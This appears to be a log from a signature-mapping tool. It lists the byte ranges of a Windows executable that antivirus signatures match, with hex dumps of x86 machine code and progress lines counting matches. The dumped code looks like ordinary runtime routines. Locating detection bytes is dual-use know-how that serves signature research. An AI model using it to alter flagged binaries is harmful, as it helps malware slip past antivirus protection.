[INFO    ][2023-07-21 13:35:13,385] _scanDataPart() :: Result: 33392-33664 (272 bytes)
00008270   53 E8 92 A3 FF FF 59 3B F0 75 6A BF 34 B2 41 00    S.....Y;.uj.4.A.
00008280   FF 05 D0 AC 41 00 8D 4E 0C 8B 01 90 A9 C0 04 00    ....A..N........
00008290   00 75 52 B8 82 02 00 00 F0 09 01 8B 07 85 C0 75    .uR............u
000082A0   2D 68 00 10 00 00 E8 8C E7 FF FF 6A 00 89 07 E8    -h.........j....
000082B0   67 DD FF FF 8B 07 59 59 85 C0 75 12 8D 4E 14 89    g.....YY..u..N..
000082C0   5E 08 89 4E 04 89 0E 89 5E 18 B0 01 EB 19 89 46    ^..N....^......F
000082D0   04 8B 07 89 06 C7 46 08 00 10 00 00 C7 46 18 00    ......F......F..
000082E0   10 00 00 EB E5 32 C0 5F 5E 5B 5D C3 8B FF 55 8B    .....2._^[]...U.
000082F0   EC 80 7D 08 00 74 2D 56 8B 75 0C 57 8D 7E 0C 8B    ..}..t-V.u.W.~..
00008300   07 90 C1 E8 09 A8 01 74 19 56 E8 3C E4 FF FF 59    .......t.V.<...Y
00008310   B8 7F FD FF FF F0 21 07 33 C0 89 46 18 89 46 04    ......!.3..F..F.
00008320   89 06 5F 5E 5D C3 8B FF 55 8B EC 8B 55 08 56 85    .._^]...U...U.V.
00008330   D2 74 13 8B 4D 0C 85 C9 74 0C 8B 75 10 85 F6 75    .t..M...t..u...u
00008340   19 33 C0 66 89 02 E8 60 DC FF FF 6A 16 5E 89 30    .3.f...`...j.^.0
00008350   E8 99 DB FF FF 8B C6 5E 5D C3 57 8B FA 2B F2 0F    .......^].W..+..
00008360   B7 04 3E 66 89 07 8D 7F 02 66 85 C0 74 05 83 E9    ..>f.....f..t...
00008370   01 75 EC 5F 85 C9 75 0E 33 C0 66 89 02 E8 29 DC    .u._..u.3.f...).
[INFO    ][2023-07-21 13:35:13,387] _scanDataPart() :: Result: 33664-33800 (136b minChunk:128 X)
00008380   FF FF 6A 22 EB C7 33 F6 EB CB 8B FF 55 8B EC 8B    ..j"..3.....U...
00008390   4D 08 53 8B 5D 10 56 8B 75 14 85 F6 75 1E 85 C9    M.S.].V.u...u...
000083A0   75 1E 39 75 0C 74 29 E8 FF DB FF FF 6A 16 5E 89    u.9u.t).....j.^.
000083B0   30 E8 38 DB FF FF 8B C6 5E 5B 5D C3 85 C9 74 E7    0.8.....^[]...t.
000083C0   8B 45 0C 85 C0 74 E0 85 F6 75 09 33 C0 66 89 01    .E...t...u.3.f..
000083D0   33 C0 EB E4 85 DB 75 07 33 C0 66 89 01 EB C8 2B    3.....u.3.f....+
000083E0   D9 8B D1 57 8B F8 83 FE FF 75 16 0F B7 04 13 66    ...W.....u.....f
000083F0   89 02 8D 52 02 66 85 C0 74 2E 83 EF 01 75 EC EB    ...R.f..t....u..
00008400   27 8B CE 0F B7 04 13 66                            '......f
[INFO    ][2023-07-21 13:35:13,389] _scanDataPart() :: Result: 35160-35296 (136b minChunk:128 X)
00008958   8D 04 98 89 4E 04 89 46 08 33 F6 6A 00 E8 B1 D6    ....N..F.3.j....
00008968   FF FF 59 8B C6 5B 5F 5E C3 8B FF 55 8B EC 5D E9    ..Y..[_^...U..].
00008978   FC FA FF FF 6A 08 68 68 91 41 00 E8 68 8A FF FF    ....j.hh.A..h...
00008988   8B 45 08 FF 30 E8 5A 0D 00 00 59 83 65 FC 00 8B    .E..0.Z...Y.e...
00008998   4D 0C E8 2A 00 00 00 C7 45 FC FE FF FF FF E8 12    M..*....E.......
000089A8   00 00 00 8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E    ....M.d......Y_^
000089B8   5B C9 C2 0C 00 8B 45 10 FF 30 E8 6D 0D 00 00 59    [.....E..0.m...Y
000089C8   C3 8B FF 56 8B F1 B9 01 01 00 00 51 8B 06 8B 00    ...V.......Q....
000089D8   8B 40 48 83 C0 18 50 51                            .@H...PQ
[INFO    ][2023-07-21 13:35:14,060] _scanDataPart() :: Result: 35296-35568 (272 bytes)
000089E0   FF 35 3C B2 41 00 E8 F7 06 00 00 8B 06 B9 00 01    .5<.A...........
000089F0   00 00 51 8B 00 8B 40 48 05 19 01 00 00 50 51 FF    ..Q...@H.....PQ.
00008A00   35 40 B2 41 00 E8 D8 06 00 00 8B 46 04 83 C4 20    5@.A.......F... 
00008A10   83 C9 FF 8B 00 8B 00 F0 0F C1 08 75 15 8B 46 04    ...........u..F.
00008A20   8B 00 81 38 00 A2 41 00 74 08 FF 30 E8 EA D5 FF    ...8..A.t..0....
00008A30   FF 59 8B 06 8B 10 8B 46 04 8B 08 8B 42 48 89 01    .Y.....F....BH..
00008A40   8B 06 8B 00 8B 40 48 F0 FF 00 5E C3 8B FF 55 8B    .....@H...^...U.
00008A50   EC 8B 45 08 2D A4 03 00 00 74 28 83 E8 04 74 1C    ..E.-....t(...t.
00008A60   83 E8 0D 74 10 83 E8 01 74 04 33 C0 5D C3 A1 6C    ...t....t.3.]..l
00008A70   3D 41 00 5D C3 A1 68 3D 41 00 5D C3 A1 64 3D 41    =A.]..h=A.]..d=A
00008A80   00 5D C3 A1 60 3D 41 00 5D C3 8B FF 55 8B EC 83    .]..`=A.]...U...
00008A90   EC 10 8D 4D F0 6A 00 E8 8A A1 FF FF 83 25 48 B2    ...M.j.......%H.
00008AA0   41 00 00 8B 45 08 83 F8 FE 75 12 C7 05 48 B2 41    A...E....u...H.A
00008AB0   00 01 00 00 00 FF 15 C4 20 41 00 EB 2C 83 F8 FD    ........ A..,...
00008AC0   75 12 C7 05 48 B2 41 00 01 00 00 00 FF 15 C0 20    u...H.A........ 
00008AD0   41 00 EB 15 83 F8 FC 75 10 8B 45 F4 C7 05 48 B2    A......u..E...H.
00008AE0   41 00 01 00 00 00 8B 40 08 80 7D FC 00 74 0A 8B    A......@..}..t..
[INFO    ][2023-07-21 13:35:14,060] _printStatus() :: Reducing: 474 chunks done, found 54 matches (173 added)
[INFO    ][2023-07-21 13:35:14,756] _scanDataPart() :: Result: 35568-35840 (272 bytes)
00008AF0   4D F0 83 A1 50 03 00 00 FD C9 C3 8B FF 55 8B EC    M...P........U..
00008B00   53 8B 5D 08 56 57 68 01 01 00 00 33 FF 8D 73 18    S.].VWh....3..s.
00008B10   57 56 E8 F9 8D FF FF 89 7B 04 33 C0 89 7B 08 83    WV......{.3..{..
00008B20   C4 0C 89 BB 1C 02 00 00 B9 01 01 00 00 8D 7B 0C    ..............{.
00008B30   AB AB AB BF 00 A2 41 00 2B FB 8A 04 37 88 06 46    ......A.+...7..F
00008B40   83 E9 01 75 F5 8D 8B 19 01 00 00 BA 00 01 00 00    ...u............
00008B50   8A 04 39 88 01 41 83 EA 01 75 F5 5F 5E 5B 5D C3    ..9..A...u._^[].
00008B60   8B FF 55 8B EC 81 EC 18 07 00 00 A1 04 A0 41 00    ..U...........A.
00008B70   33 C5 89 45 FC 53 56 8B 75 08 57 81 7E 04 E9 FD    3..E.SV.u.W.~...
00008B80   00 00 0F 84 0C 01 00 00 8D 85 E8 F8 FF FF 50 FF    ..............P.
00008B90   76 04 FF 15 C8 20 41 00 85 C0 0F 84 F4 00 00 00    v.... A.........
00008BA0   33 DB BF 00 01 00 00 8B C3 88 84 05 FC FE FF FF    3...............
00008BB0   40 3B C7 72 F4 8A 85 EE F8 FF FF 8D 8D EE F8 FF    @;.r............
00008BC0   FF C6 85 FC FE FF FF 20 EB 1F 0F B6 51 01 0F B6    ....... ....Q...
00008BD0   C0 EB 0D 3B C7 73 0D C6 84 05 FC FE FF FF 20 40    ...;.s........ @
00008BE0   3B C2 76 EF 83 C1 02 8A 01 84 C0 75 DD 53 FF 76    ;.v........u.S.v
00008BF0   04 8D 85 FC F8 FF FF 50 57 8D 85 FC FE FF FF 50    .......PW......P
[INFO    ][2023-07-21 13:35:15,585] _scanDataPart() :: Result: 35976-36112 (136b minChunk:128 X)
00008C88   06 19 01 00 00 40 3B C7 72 C4 EB 3D 33 DB BF 00    .....@;.r..=3...
00008C98   01 00 00 8B CB 8D 51 9F 8D 42 20 83 F8 19 77 0A    ......Q..B ...w.
00008CA8   80 4C 0E 19 10 8D 41 20 EB 13 83 FA 19 77 0C 8D    .L....A .....w..
00008CB8   04 0E 80 48 19 20 8D 41 E0 EB 02 8A C3 88 84 0E    ...H. .A........
00008CC8   19 01 00 00 41 3B CF 72 CC 8B 4D FC 5F 5E 33 CD    ....A;.r..M._^3.
00008CD8   5B E8 FB 7D FF FF C9 C3 8B FF 55 8B EC 83 EC 14    [..}......U.....
00008CE8   FF 75 14 FF 75 10 E8 01 01 00 00 FF 75 08 E8 8F    .u..u.......u...
00008CF8   FD FF FF 8B 4D 10 83 C4 0C 89 45 F4 8B 49 48 3B    ....M.....E..IH;
00008D08   41 04 75 04 33 C0 C9 C3                            A.u.3...
[INFO    ][2023-07-21 13:35:16,277] _scanDataPart() :: Result: 36112-36384 (272 bytes)
00008D10   53 56 57 68 20 02 00 00 E8 1A DD FF FF 8B F8 83    SVWh ...........
00008D20   CB FF 59 85 FF 74 2E 8B 75 10 B9 88 00 00 00 8B    ..Y..t..u.......
00008D30   76 48 F3 A5 8B F8 57 FF 75 F4 83 27 00 E8 AD 01    vH....W.u..'....
00008D40   00 00 8B F0 59 59 3B F3 75 1B E8 5C D2 FF FF C7    ....YY;.u..\....
00008D50   00 16 00 00 00 8B F3 57 E8 BE D2 FF FF 59 5F 8B    .......W.....Y_.
00008D60   C6 5E 5B C9 C3 80 7D 0C 00 75 05 E8 10 C2 FF FF    .^[...}..u......
00008D70   8B 45 10 8B 40 48 F0 0F C1 18 4B 75 15 8B 45 10    .E..@H....Ku..E.
00008D80   81 78 48 00 A2 41 00 74 09 FF 70 48 E8 8A D2 FF    .xH..A.t..pH....
00008D90   FF 59 C7 07 01 00 00 00 8B CF 8B 45 10 33 FF 89    .Y.........E.3..
00008DA0   48 48 8B 4D 10 A1 80 A7 41 00 85 81 50 03 00 00    HH.M....A...P...
00008DB0   75 A5 8D 45 10 89 45 EC 8D 4D FF 6A 05 8D 45 14    u..E..E..M.j..E.
00008DC0   89 45 F0 58 89 45 F4 89 45 F8 8D 45 F4 50 8D 45    .E.X.E..E..E.P.E
00008DD0   EC 50 8D 45 F8 50 E8 A1 FB FF FF 80 7D 0C 00 0F    .P.E.P......}...
00008DE0   84 72 FF FF FF 8B 45 14 8B 00 A3 F4 A1 41 00 E9    .r....E......A..
00008DF0   63 FF FF FF 6A 0C 68 48 91 41 00 E8 F0 85 FF FF    c...j.hH.A......
00008E00   33 F6 89 75 E4 8B 7D 08 A1 80 A7 41 00 85 87 50    3..u..}....A...P
00008E10   03 00 00 74 0E 39 77 4C 74 09 8B 77 48 85 F6 74    ...t.9wLt..wH..t
[INFO    ][2023-07-21 13:35:16,277] _printStatus() :: Reducing: 485 chunks done, found 55 matches (176 added)
[INFO    ][2023-07-21 13:35:16,950] _scanDataPart() :: Result: 36384-36656 (272 bytes)
00008E20   6D EB 59 6A 05 E8 C2 08 00 00 59 89 75 FC 8B 77    m.Yj......Y.u..w
00008E30   48 89 75 E4 8B 5D 0C 3B 33 74 27 85 F6 74 18 83    H.u..].;3t'..t..
00008E40   C8 FF F0 0F C1 06 75 0F 81 FE 00 A2 41 00 74 07    ......u.....A.t.
00008E50   56 E8 C5 D1 FF FF 59 8B 33 89 77 48 89 75 E4 F0    V.....Y.3.wH.u..
00008E60   FF 06 C7 45 FC FE FF FF FF E8 05 00 00 00 EB AD    ...E............
00008E70   8B 75 E4 6A 05 E8 BA 08 00 00 59 C3 8B C6 8B 4D    .u.j......Y....M
00008E80   F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 E8 47    .d......Y_^[...G
00008E90   C7 FF FF CC 80 3D 4C B2 41 00 00 75 3C C7 05 44    .....=L.A..u<..D
00008EA0   B2 41 00 00 A2 41 00 C7 05 40 B2 41 00 28 A5 41    .A...A...@.A.(.A
00008EB0   00 C7 05 3C B2 41 00 20 A4 41 00 E8 89 E4 FF FF    ...<.A. .A......
00008EC0   68 44 B2 41 00 50 6A 01 6A FD E8 11 FE FF FF 83    hD.A.Pj.j.......
00008ED0   C4 10 C6 05 4C B2 41 00 01 B0 01 C3 68 44 B2 41    ....L.A.....hD.A
00008EE0   00 E8 A6 E3 FF FF 50 E8 08 FF FF FF 59 59 C3 8B    ......P.....YY..
00008EF0   FF 55 8B EC 83 EC 20 A1 04 A0 41 00 33 C5 89 45    .U.... ...A.3..E
00008F00   FC 53 56 8B 75 0C 57 FF 75 08 E8 7B FB FF FF 8B    .SV.u.W.u..{....
00008F10   D8 59 85 DB 0F 84 B0 01 00 00 33 FF 8B CF 8B C7    .Y........3.....
00008F20   89 4D E4 39 98 30 A6 41 00 0F 84 F3 00 00 00 41    .M.9.0.A.......A
[INFO    ][2023-07-21 13:35:17,639] _scanDataPart() :: Result: 36656-36928 (272 bytes)
00008F30   83 C0 30 89 4D E4 3D F0 00 00 00 72 E6 81 FB E8    ..0.M.=....r....
00008F40   FD 00 00 0F 84 D1 00 00 00 0F B7 C3 50 FF 15 BC    ............P...
00008F50   20 41 00 85 C0 0F 84 BF 00 00 00 B8 E9 FD 00 00     A..............
00008F60   3B D8 75 26 89 46 04 89 BE 1C 02 00 00 89 7E 18    ;.u&.F........~.
00008F70   66 89 7E 1C 89 7E 08 33 C0 8D 7E 0C AB AB AB 56    f.~..~.3..~....V
00008F80   E8 DB FB FF FF E9 46 01 00 00 8D 45 E8 50 53 FF    ......F....E.PS.
00008F90   15 C8 20 41 00 85 C0 74 75 68 01 01 00 00 8D 46    .. A...tuh.....F
00008FA0   18 57 50 E8 68 89 FF FF 83 C4 0C 89 5E 04 83 7D    .WP.h.......^..}
00008FB0   E8 02 89 BE 1C 02 00 00 75 BA 80 7D EE 00 8D 45    ........u..}...E
00008FC0   EE 74 21 8A 48 01 84 C9 74 1A 0F B6 D1 0F B6 08    .t!.H...t.......
00008FD0   EB 06 80 4C 0E 19 04 41 3B CA 76 F6 83 C0 02 80    ...L...A;.v.....
00008FE0   38 00 75 DF 8D 46 1A B9 FE 00 00 00 80 08 08 40    8.u..F.........@
00008FF0   83 E9 01 75 F7 FF 76 04 E8 4F FA FF FF 33 FF 89    ...u..v..O...3..
00009000   86 1C 02 00 00 83 C4 04 47 E9 66 FF FF FF 39 3D    ........G.f...9=
00009010   48 B2 41 00 0F 85 B0 00 00 00 83 C8 FF E9 B1 00    H.A.............
00009020   00 00 68 01 01 00 00 8D 46 18 57 50 E8 DF 88 FF    ..h.....F.WP....
00009030   FF 83 C4 0C 6B 45 E4 30 89 45 E0 8D 80 40 A6 41    ....kE.0.E...@.A
[INFO    ][2023-07-21 13:35:18,499] _printStatus() :: Reducing: 491 chunks done, found 55 matches (178 added)
[INFO    ][2023-07-21 13:35:18,499] _scanDataPart() :: Result: 37064-37200 (136b minChunk:128 X)
000090C8   FF FF 56 E8 2B FA FF FF 33 C0 59 8B 4D FC 5F 5E    ..V.+...3.Y.M._^
000090D8   33 CD 5B E8 F9 79 FF FF C9 C3 8B FF 55 8B EC 56    3.[..y......U..V
000090E8   8B 75 14 85 F6 75 04 33 C0 EB 6D 8B 45 08 85 C0    .u...u.3..m.E...
000090F8   75 13 E8 AC CE FF FF 6A 16 5E 89 30 E8 E5 CD FF    u......j.^.0....
00009108   FF 8B C6 EB 53 57 8B 7D 10 85 FF 74 14 39 75 0C    ....SW.}...t.9u.
00009118   72 0F 56 57 50 E8 9E 8E FF FF 83 C4 0C 33 C0 EB    r.VWP........3..
00009128   36 FF 75 0C 6A 00 50 E8 DC 87 FF FF 83 C4 0C 85    6.u.j.P.........
00009138   FF 75 09 E8 6B CE FF FF 6A 16 EB 0C 39 75 0C 73    .u..k...j...9u.s
00009148   13 E8 5D CE FF FF 6A 22                            ..]...j"
[INFO    ][2023-07-21 13:35:19,189] _scanDataPart() :: Result: 37200-37472 (272 bytes)
00009150   5E 89 30 E8 96 CD FF FF 8B C6 EB 03 6A 16 58 5F    ^.0.........j.X_
00009160   5E 5D C3 8B FF 55 8B EC 8B 45 08 B9 35 C4 00 00    ^]...U...E..5...
00009170   3B C1 77 28 74 65 83 F8 2A 74 60 3D 2B C4 00 00    ;.w(te..*t`=+...
00009180   76 15 3D 2E C4 00 00 76 52 3D 31 C4 00 00 74 4B    v.=....vR=1...tK
00009190   3D 33 C4 00 00 74 44 8B 4D 0C EB 29 3D 98 D6 00    =3...tD.M..)=...
000091A0   00 74 1C 3D A9 DE 00 00 76 ED 3D B3 DE 00 00 76    .t.=....v.=....v
000091B0   2A 3D E8 FD 00 00 74 23 3D E9 FD 00 00 75 D8 8B    *=....t#=....u..
000091C0   4D 0C 83 E1 08 FF 75 1C FF 75 18 FF 75 14 FF 75    M.....u..u..u..u
000091D0   10 51 50 FF 15 CC 20 41 00 5D C3 33 C9 EB E6 8B    .QP... A.].3....
000091E0   FF 55 8B EC 8B 45 08 BA E9 FD 00 00 53 56 57 8D    .U...E......SVW.
000091F0   72 FF 3B C6 74 08 3B C2 74 04 32 DB EB 02 B3 01    r.;.t.;.t.2.....
00009200   B9 35 C4 00 00 3B C1 77 23 74 49 83 F8 2A 74 44    .5...;.w#tI..*tD
00009210   3D 2B C4 00 00 76 32 3D 2E C4 00 00 76 36 3D 31    =+...v2=....v6=1
00009220   C4 00 00 74 2F 3D 33 C4 00 00 EB 1B 3D 98 D6 00    ...t/=3.....=...
00009230   00 74 21 3D A9 DE 00 00 76 0F 3D B3 DE 00 00 76    .t!=....v.=....v
00009240   13 3B C6 74 0F 3B C2 74 0B 8B 4D 0C 81 E1 7F FF    .;.t.;.t..M.....
00009250   FF FF EB 02 33 C9 8B 7D 24 0F B6 D3 F7 DA 0F B6    ....3..}$.......
[INFO    ][2023-07-21 13:35:19,191] _scanDataPart() :: Result: 37472-37744 (272 bytes)
00009260   F3 1B D2 F7 D2 23 D7 F7 DE 1B F6 F7 D6 23 75 20    .....#.......#u 
00009270   84 DB 74 07 85 FF 74 03 83 27 00 52 56 FF 75 1C    ..t...t..'.RV.u.
00009280   FF 75 18 FF 75 14 FF 75 10 51 50 FF 15 D0 20 41    .u..u..u.QP... A
00009290   00 5F 5E 5B 5D C3 8B FF 55 8B EC 8B 55 08 57 33    ._^[]...U...U.W3
000092A0   FF 66 39 3A 74 21 56 8B CA 8D 71 02 66 8B 01 83    .f9:t!V...q.f...
000092B0   C1 02 66 3B C7 75 F5 2B CE D1 F9 8D 14 4A 83 C2    ..f;.u.+.....J..
000092C0   02 66 39 3A 75 E1 5E 8D 42 02 5F 5D C3 8B FF 56    .f9:u.^.B._]...V
000092D0   57 FF 15 D4 20 41 00 8B F0 85 F6 75 04 33 FF EB    W... A.....u.3..
000092E0   37 53 56 E8 AE FF FF FF 8B D8 2B DE 83 E3 FE 53    7SV.......+....S
000092F0   E8 42 D7 FF FF 8B F8 59 59 85 FF 74 0B 53 56 57    .B.....YY..t.SVW
00009300   E8 BB 8C FF FF 83 C4 0C 6A 00 E8 0C CD FF FF 59    ........j......Y
00009310   56 FF 15 D8 20 41 00 5B 8B C7 5F 5E C3 8B FF 55    V... A.[.._^...U
00009320   8B EC 83 EC 10 53 8B 5D 08 85 DB 75 13 E8 79 CC    .....S.]...u..y.
00009330   FF FF C7 00 16 00 00 00 83 C8 FF E9 22 02 00 00    ............"...
00009340   56 57 6A 3D 53 8B FB E8 44 7F 00 00 89 45 F4 59    VWj=S...D....E.Y
00009350   59 85 C0 0F 84 F0 01 00 00 3B C3 0F 84 E8 01 00    Y........;......
00009360   00 0F B7 48 02 8B C1 89 45 F0 89 45 F8 E8 BC 02    ...H....E..E....
[INFO    ][2023-07-21 13:35:19,852] _scanDataPart() :: Result: 38560-38832 (272 bytes)
000096A0   8B FF 55 8B EC 5D E9 72 FC FF FF 8B FF 56 57 BF    ..U..].r.....VW.
000096B0   50 B2 41 00 33 F6 6A 00 68 A0 0F 00 00 57 E8 C6    P.A.3.j.h....W..
000096C0   CC FF FF 85 C0 74 18 FF 05 A0 B3 41 00 83 C6 18    .....t.....A....
000096D0   83 C7 18 81 FE 50 01 00 00 72 DB B0 01 EB 0A 6A    .....P...r.....j
000096E0   00 E8 1D 00 00 00 59 32 C0 5F 5E C3 8B FF 55 8B    ......Y2._^...U.
000096F0   EC 6B 45 08 18 05 50 B2 41 00 50 FF 15 50 20 41    .kE...P.A.P..P A
00009700   00 5D C3 8B FF 56 8B 35 A0 B3 41 00 85 F6 74 20    .]...V.5..A...t 
00009710   6B C6 18 57 8D B8 38 B2 41 00 57 FF 15 58 20 41    k..W..8.A.W..X A
00009720   00 FF 0D A0 B3 41 00 83 EF 18 83 EE 01 75 EB 5F    .....A.......u._
00009730   B0 01 5E C3 8B FF 55 8B EC 6B 45 08 18 05 50 B2    ..^...U..kE...P.
00009740   41 00 50 FF 15 54 20 41 00 5D C3 8B FF 55 8B EC    A.P..T A.]...U..
00009750   51 64 A1 30 00 00 00 56 33 F6 89 75 FC 8B 40 10    Qd.0...V3..u..@.
00009760   39 70 08 7C 0F 8D 45 FC 50 E8 7F CA FF FF 83 7D    9p.|..E.P......}
00009770   FC 01 74 03 33 F6 46 8B C6 5E C9 C3 8B FF 55 8B    ..t.3.F..^....U.
00009780   EC 51 51 53 56 6A 38 6A 40 E8 30 C8 FF FF 8B F0    .QQSVj8j@.0.....
00009790   33 DB 89 75 F8 59 59 85 F6 75 04 8B F3 EB 4B 8D    3..u.YY..u....K.
000097A0   86 00 0E 00 00 3B F0 74 41 57 8D 7E 20 8B F0 53    .....;.tAW.~ ..S
[INFO    ][2023-07-21 13:35:20,515] _scanDataPart() :: Result: 38832-39104 (272 bytes)
000097B0   68 A0 0F 00 00 8D 47 E0 50 E8 CB CB FF FF 83 4F    h.....G.P......O
000097C0   F8 FF 80 67 0D F8 89 1F 8D 7F 38 89 5F CC 8D 47    ...g......8._..G
000097D0   E0 C7 47 D0 00 00 0A 0A C6 47 D4 0A 89 5F D6 88    ..G......G..._..
000097E0   5F DA 3B C6 75 C9 8B 75 F8 5F 53 E8 2B C8 FF FF    _.;.u..u._S.+...
000097F0   59 8B C6 5E 5B C9 C3 8B FF 55 8B EC 56 8B 75 08    Y..^[....U..V.u.
00009800   85 F6 74 25 53 8D 9E 00 0E 00 00 57 8B FE 3B F3    ..t%S......W..;.
00009810   74 0E 57 FF 15 58 20 41 00 83 C7 38 3B FB 75 F2    t.W..X A...8;.u.
00009820   56 E8 F5 C7 FF FF 59 5F 5B 5E 5D C3 6A 10 68 88    V.....Y_[^].j.h.
00009830   91 41 00 E8 B8 7B FF FF 81 7D 08 00 20 00 00 72    .A...{...}.. ..r
00009840   21 E8 65 C7 FF FF 6A 09 5E 89 30 E8 9E C6 FF FF    !.e...j.^.0.....
00009850   8B C6 8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B    ...M.d......Y_^[
00009860   C9 C3 33 F6 89 75 E4 6A 07 E8 7E FE FF FF 59 89    ..3..u.j..~...Y.
00009870   75 FC 8B FE A1 20 B2 41 00 89 7D E0 39 45 08 7C    u.... .A..}.9E.|
00009880   1F 39 34 BD 20 B0 41 00 75 31 E8 ED FE FF FF 89    .94. .A.u1......
00009890   04 BD 20 B0 41 00 85 C0 75 14 6A 0C 5E 89 75 E4    .. .A...u.j.^.u.
000098A0   C7 45 FC FE FF FF FF E8 15 00 00 00 EB A2 A1 20    .E............. 
000098B0   B2 41 00 83 C0 40 A3 20 B2 41 00 47 EB BB 8B 75    .A...@. .A.G...u
[INFO    ][2023-07-21 13:35:20,515] _printStatus() :: Reducing: 500 chunks done, found 57 matches (183 added)
[INFO    ][2023-07-21 13:35:20,515] _scanDataPart() :: Doubling: minChunkSize: 128  minMatchSize: 256
[INFO    ][2023-07-21 13:35:20,516] _scanDataPart() :: Result: 39104-39648 (544 bytes)
000098C0   E4 6A 07 E8 6C FE FF FF 59 C3 8B FF 55 8B EC 8B    .j..l...Y...U...
000098D0   45 08 8B C8 83 E0 3F C1 F9 06 6B C0 38 03 04 8D    E.....?...k.8...
000098E0   20 B0 41 00 50 FF 15 50 20 41 00 5D C3 8B FF 55     .A.P..P A.]...U
000098F0   8B EC 8B 45 08 8B C8 83 E0 3F C1 F9 06 6B C0 38    ...E.....?...k.8
00009900   03 04 8D 20 B0 41 00 50 FF 15 54 20 41 00 5D C3    ... .A.P..T A.].
00009910   8B FF 55 8B EC 53 56 8B 75 08 57 85 F6 78 67 3B    ..U..SV.u.W..xg;
00009920   35 20 B2 41 00 73 5F 8B C6 8B FE 83 E0 3F C1 FF    5 .A.s_......?..
00009930   06 6B D8 38 8B 04 BD 20 B0 41 00 F6 44 03 28 01    .k.8... .A..D.(.
00009940   74 44 83 7C 03 18 FF 74 3D E8 97 AB FF FF 83 F8    tD.|...t=.......
00009950   01 75 23 33 C0 2B F0 74 14 83 EE 01 74 0A 83 EE    .u#3.+.t....t...
00009960   01 75 13 50 6A F4 EB 08 50 6A F5 EB 03 50 6A F6    .u.Pj...Pj...Pj.
00009970   FF 15 E0 20 41 00 8B 04 BD 20 B0 41 00 83 4C 03    ... A.... .A..L.
00009980   18 FF 33 C0 EB 16 E8 20 C6 FF FF C7 00 09 00 00    ..3.... ........
00009990   00 E8 02 C6 FF FF 83 20 00 83 C8 FF 5F 5E 5B 5D    ....... ...._^[]
000099A0   C3 8B FF 55 8B EC 8B 4D 08 83 F9 FE 75 15 E8 E5    ...U...M....u...
000099B0   C5 FF FF 83 20 00 E8 F0 C5 FF FF C7 00 09 00 00    .... ...........
000099C0   00 EB 43 85 C9 78 27 3B 0D 20 B2 41 00 73 1F 8B    ..C..x';. .A.s..
000099D0   C1 83 E1 3F C1 F8 06 6B C9 38 8B 04 85 20 B0 41    ...?...k.8... .A
000099E0   00 F6 44 08 28 01 74 06 8B 44 08 18 5D C3 E8 A5    ..D.(.t..D..]...
000099F0   C5 FF FF 83 20 00 E8 B0 C5 FF FF C7 00 09 00 00    .... ...........
00009A00   00 E8 E8 C4 FF FF 83 C8 FF 5D C3 83 3D A4 B3 41    .........]..=..A
00009A10   00 00 75 0A C7 05 A4 B3 41 00 00 40 00 00 33 C0    ..u.....A..@..3.
00009A20   C3 8B FF 55 8B EC 56 8B 75 08 85 F6 0F 84 EA 00    ...U..V.u.......
00009A30   00 00 8B 46 0C 3B 05 34 A7 41 00 74 07 50 E8 D8    ...F.;.4.A.t.P..
00009A40   C5 FF FF 59 8B 46 10 3B 05 38 A7 41 00 74 07 50    ...Y.F.;.8.A.t.P
00009A50   E8 C6 C5 FF FF 59 8B 46 14 3B 05 3C A7 41 00 74    .....Y.F.;.<.A.t
00009A60   07 50 E8 B4 C5 FF FF 59 8B 46 18 3B 05 40 A7 41    .P.....Y.F.;.@.A
00009A70   00 74 07 50 E8 A2 C5 FF FF 59 8B 46 1C 3B 05 44    .t.P.....Y.F.;.D
00009A80   A7 41 00 74 07 50 E8 90 C5 FF FF 59 8B 46 20 3B    .A.t.P.....Y.F ;
00009A90   05 48 A7 41 00 74 07 50 E8 7E C5 FF FF 59 8B 46    .H.A.t.P.~...Y.F
00009AA0   24 3B 05 4C A7 41 00 74 07 50 E8 6C C5 FF FF 59    $;.L.A.t.P.l...Y
00009AB0   8B 46 38 3B 05 60 A7 41 00 74 07 50 E8 5A C5 FF    .F8;.`.A.t.P.Z..
00009AC0   FF 59 8B 46 3C 3B 05 64 A7 41 00 74 07 50 E8 48    .Y.F<;.d.A.t.P.H
00009AD0   C5 FF FF 59 8B 46 40 3B 05 68 A7 41 00 74 07 50    ...Y.F@;.h.A.t.P
[INFO    ][2023-07-21 13:35:20,518] _scanDataPart() :: Result: 40192-40736 (544 bytes)
00009D00   EB 33 C0 83 C1 02 66 39 01 75 D5 33 C0 5F 5E 5B    .3....f9.u.3._^[
00009D10   5D C3 8B C1 EB F7 8B FF 55 8B EC 83 EC 1C A1 04    ].......U.......
00009D20   A0 41 00 33 C5 89 45 FC 53 56 57 FF 75 08 8D 4D    .A.3..E.SVW.u..M
00009D30   E4 E8 F0 8E FF FF 8B 5D 1C 85 DB 75 06 8B 45 E8    .......]...u..E.
00009D40   8B 58 08 33 C0 33 FF 39 45 20 57 57 FF 75 14 0F    .X.3.3.9E WW.u..
00009D50   95 C0 FF 75 10 8D 04 C5 01 00 00 00 50 53 E8 00    ...u........PS..
00009D60   F4 FF FF 83 C4 18 89 45 F4 85 C0 0F 84 84 00 00    .......E........
00009D70   00 8D 14 00 8D 4A 08 89 55 F8 3B D1 1B C0 23 C1    .....J..U.;...#.
00009D80   74 35 3D 00 04 00 00 77 13 E8 D2 72 00 00 8B F4    t5=....w...r....
00009D90   85 F6 74 1E C7 06 CC CC 00 00 EB 13 50 E8 95 CC    ..t.........P...
00009DA0   FF FF 8B F0 59 85 F6 74 09 C7 06 DD DD 00 00 83    ....Y..t........
00009DB0   C6 08 8B 55 F8 EB 02 8B F7 85 F6 74 31 52 57 56    ...U.......t1RWV
00009DC0   E8 4B 7B FF FF FF 75 F4 56 FF 75 14 FF 75 10 6A    .K{...u.V.u..u.j
00009DD0   01 53 E8 8C F3 FF FF 83 C4 24 85 C0 74 10 FF 75    .S.......$..t..u
00009DE0   18 50 56 FF 75 0C FF 15 E4 20 41 00 8B F8 56 E8    .PV.u.... A...V.
00009DF0   25 00 00 00 59 80 7D F0 00 74 0A 8B 45 E4 83 A0    %...Y.}..t..E...
00009E00   50 03 00 00 FD 8B C7 8D 65 D8 5F 5E 5B 8B 4D FC    P.......e._^[.M.
00009E10   33 CD E8 C2 6C FF FF C9 C3 8B FF 55 8B EC 8B 45    3...l......U...E
00009E20   08 85 C0 74 12 83 E8 08 81 38 DD DD 00 00 75 07    ...t.....8....u.
